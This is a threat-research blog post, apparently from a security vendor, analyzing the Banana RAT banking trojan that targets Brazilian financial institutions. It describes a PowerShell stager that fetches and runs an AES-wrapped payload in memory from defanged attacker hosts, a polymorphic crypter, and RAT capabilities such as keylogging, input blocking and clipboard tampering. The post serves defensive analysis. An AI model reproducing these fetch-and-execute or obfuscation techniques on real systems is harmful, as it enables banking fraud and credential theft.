Cyber Threats Inside SHADOW-WATER-063’s Banana RAT: From Build Server to Banking Fraud In this blog entry, researchers from the TrendAI™ MDR team discuss how they mapped the full end-to-end operation of SHADOW-WATER-063’s Banana RAT banking malware by analyzing server-side artifacts and victim-side data. By: Aldrin Ceriola, Gabriel Nicoleta, Jovit Samaniego, Mohamed Fahmy May 19, 2026 Read time: ( words) Save to Folio Key takeaways An MDR investigation correlated attacker infrastructure and endpoint telemetry to map the full operational model of Banana RAT, a banking trojan attributed to a threat activity cluster that TrendAI™ tracks as SHADOW-WATER-063. By correlating artifacts like recovered server tooling and client payloads, TrendAI Vision One™ Services – Managed Detection and Response (MDR) reconstructed the full attack chain, from polymorphic payload generation and staged delivery to in-memory execution and encrypted C&C communication. The malware uses layered obfuscation, AES-wrapped payloads, and fileless PowerShell execution to evade detection and persistence controls. Once active, it enables operator-driven fraud through remote input control, keylogging, screen streaming, and Pix QR code interception targeting Brazilian financial institutions. Defenders are often left to piece together how a cyberattack works from limited visibility on infected systems. But during its investigation into a live Brazilian banking trojan operation, the TrendAI Vision One™ Services – Managed Detection and Response (MDR) team caught both sides of it. While most threat investigations start at the endpoint, this engagement gave us an uncommon view: Server-side tooling recovered directly from attacker infrastructure, cross-referenced against client-side telemetry from compromised hosts. The result is a full-chain picture of Banana RAT, a financially motivated threat actor operating exclusively against Brazilian financial institutions. In connection with this investigation, TrendAI™ is coordinating with the Federação Brasileira de Bancos (FEBRABAN) to share threat intelligence and support the protection of Brazilian financial institutions and their customers. Delivery : Victims lured via WhatsApp or a possible phishing URL into downloading a malicious batch file (Consultar_NF-e.bat) from a campaign-specific domain – convitemundial2026[.]com. Staged execution : The batch file launches an obfuscated PowerShell command that silently fetches and runs a second-stage payload (msedge.txt) entirely in memory – no decrypted file ever touches disk. Notable client capability: The client functions as a full remote fraud and surveillance module, combining real-time screen streaming, operator-driven input control, banking-aware overlay injection, QR/PIX transaction manipulation, and continuous keylogging to enable interactive credential theft and unauthorized financial transaction execution. Attribution : High confidence - Brazilian Portuguese operators, Tetrade-adjacent tradecraft, exclusive targeting of 16 Brazilian financial institutions, and a Pix QR interception subsystem that only exists for the Brazilian market. Inside a banking trojan operation: Mapping the server and client components During this engagement, our team recovered both halves of the operation: the attacker's server-side tooling from the delivery infrastructure, and the client-side malware from compromised endpoints. Holding both sides at once is rare, and it lets us describe the full operating model rather than infer it (Figure 1). The component relationship map in Figure 2 captures that model in a single view, with attacker-controlled components on the left, victim-side execution on the right, and a vertical divider marking the trust boundary between them. Figure 1. Banana RAT’s end-to-end kill chain download On the server side, the operator maintains a clean, unobfuscated PowerShell banker (msedge.txt) as a master source file. This source is never delivered directly. Instead, it feeds a FastAPI-based crypter service that applies multiple obfuscation layers and an AES-256-CBC wrapper, producing unique, polymorphic builds. The crypter keeps a pre-generated pool of 100 to 200 ready builds at all times so that requests can be served instantly. Each build is published as payload.php and consumed exactly once per victim request, ensuring every delivered sample is byte-unique. A separate analytics dashboard (stats-view.php) ingests web server logs to give the operator real-time visibility into campaign reach by country, ISP, operating system, and client. On the client side, execution begins with a malicious batch file that invokes PowerShell to retrieve a small staging script from one attacker-controlled host. That stager hides its console window, downloads payload.php from a second attacker-controlled host, and writes it to a world-writable path under a benign filename. It then loads the file into memory, decrypts the AES-wrapped body using the embedded key and IV, and executes the resulting plaintext via ScriptBlock::Create – a fileless pattern that prevents the decrypted banker from ever touching disk. The unpacked banker establishes persistence and opens a TCP session to the operator's command-and-control host on port 443, where it receives instructions, exfiltrates captured data, and renders bank-specific overlays on demand. Figure 2. Banana RAT campaign’s attacker infrastructure and victim-side execution chain download The two sides connect at exactly one point: A single HTTP GET request from the staging cradle (st.txt) to payload.php. This is the only arrow crossing the divider in the map, and it represents the precise moment attacker-controlled bytes become victim-side execution. The deliberate separation of delivery infrastructure from command-and-control infrastructure – visible in Figure 2 as the absence of any further crossings – gives the operator resilience: If the delivery host is taken down, existing infections continue communicating with the command-and-control (C&C) host unaffected, and if the C&C host is disrupted, the delivery pipeline remains intact for the next campaign. For defenders, the same geometry highlights where intervention is most effective. Blocking the crossing arrow at the network perimeter stops new infections cleanly, while remediating already-compromised hosts requires action against the C&C channel that the map intentionally leaves outside its frame. Initial access From MDR cases, we have observed a possible campaign targeting users in Brazil’s financial sector. Based on available telemetry, the malicious batch file users are tricked into downloading is disguised as an electronic invoice document (Consultar_NF-e.bat). The use of an NF-e (Nota Fiscal Eletrônica) filename is consistent with a business-facing lure, suggesting the actor is targeting corporate users familiar with Brazil's electronic invoicing system. eventSubId: 603 - TELEMETRY_INTERNET_DOWNLOAD Downloaded file: C:\Users\<user>\Downloads\Consultar_NF-e[.]bat Downloaded from: hxxps://convitemundial2026[.]com/Consultar_NF-e[.]bat Execution Stager (st.txt / st.php) Subsequently, the user executes that batch file. The initial stager is a 490-byte PowerShell snippet that hides the console window via user32.ShowWindow , creates C:\Users\Public\Documents\ if absent, downloads the next-stage PowerShell from hxxp://24[.]199[.]90[.]58/payload[.]php using Net.WebClient.DownloadFile , and executes the downloaded payload via IEX of a freshly created ScriptBlock . A larger variant (st.php) uses Start-BitsTransfer with a WebClient fallback for greater reliability through proxies and content-filtering (Figure 3). Figure 3. Initial PowerShell stager (st.txt) download Polymorphic build pipeline (the panel) Each victim request to payload.php causes the FastAPI panel to pop a pre-generated, hash-unique build from the pool, or generate one in under one second if the pool is empty (Figure 4). Every served payload differs in variable names, function names, .NET type-name fragmentation, junk-code insertions, XOR keys, and AES-encrypted code blobs, making file-hash detection essentially impossible at population scale (Figure 5). Figure 4. Pool configuration: 100-200 unique pre-generated builds per delivery folder, refreshed by four parallel generator threads download Figure 5. Nine sequential obfuscation layers applied to every served payload download Upon execution, the script drops msedge.txt , a staged payload file disguised as a text document, which is used to deliver second-stage malicious code for execution via PowerShell (Figure 6). The dropped file is C:\Users\Public\Documents\msedge.txt . Figure 6. Deobfuscated PowerShell payload captured via AMSI (objectRawDataStr) download Analysis of PowerShell script payload (msedge.txt) Based on the collected sample, the PowerShell script delivers a banking-focused remote access trojan with capabilities including screen capture, remote input control, keylogging, clipboard manipulation, deceptive banking overlays, file exfiltration, encrypted command-and-control communications, and SYSTEM token abuse, indicative of malware intended to enable fraudulent banking activity and attacker-controlled account compromise. Currently, this script is detected as Backdoor.PS1.BANANARAT.A . Capability Description Live screen streaming Continuously captures the desktop (all monitors, DPI-aware) using BitBlt and streams JPEG frames to the operator. Remote input control Injects mouse movement, clicks, scroll, and keystrokes via SetCursorPos/mouse_event/keybd_event Win32 APIs. Input blocking Calls BlockInput(true) to freeze the victim keyboard and mouse while the attacker operates the machine. Keylogger GetAsyncKeyState polling loop captures all keystrokes into a 2,000-entry ring buffer; sent to C&C on demand. Clipboard monitoring Reads and optionally modifies clipboard content (for example, replacing crypto wallet addresses). Pix QR code detection Uses ZXing library (